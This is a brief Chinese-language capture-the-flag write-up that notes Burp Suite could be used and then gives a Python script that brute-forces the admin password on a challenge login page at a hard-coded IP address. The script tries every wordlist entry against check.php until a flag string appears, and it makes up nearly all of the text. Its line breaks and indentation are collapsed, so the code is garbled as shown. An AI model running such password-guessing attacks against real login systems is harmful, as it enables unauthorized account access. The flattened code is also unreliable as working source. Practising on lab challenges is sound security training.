??本题可以用burp suite进行密码爆破,这里主要记录用Python脚本处理的方法,脚本如下
# -*- coding:utf-8 -*-
import requestsur1 = "http://111.200.241.244:57516/check.php"with open("wordlist.txt", "r") as f:for line in f.readlines():data1 = {
"username":"admin", "password":line.strip()}flag = requests.post(ur1, data = data1).content.decode("utf-8")print(flag)if "cyberpeace" in flag:print(flag)break